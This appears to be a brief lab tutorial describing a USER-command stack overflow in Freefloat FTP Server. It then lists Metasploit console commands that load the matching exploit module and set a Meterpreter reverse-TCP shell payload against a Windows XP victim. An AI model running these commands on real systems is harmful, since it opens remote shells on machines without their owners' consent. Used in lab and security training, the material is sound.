Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted ‘USER’ command, a remote attacker can potentially have an unspecified impact.
Exploit Targets
FreeFloat FTP Server
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/ftp/freefloatftp_user
msf exploit (freefloatftp_user)>set payload windows/meterpreter/reverse_tcp
msf exploit (freefloatftp_user)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (freefloatftp_user)>set rhost 192.168.0.110 (IP Address of Victim PC)
msf exploit (freefloatftp_user)>exploit
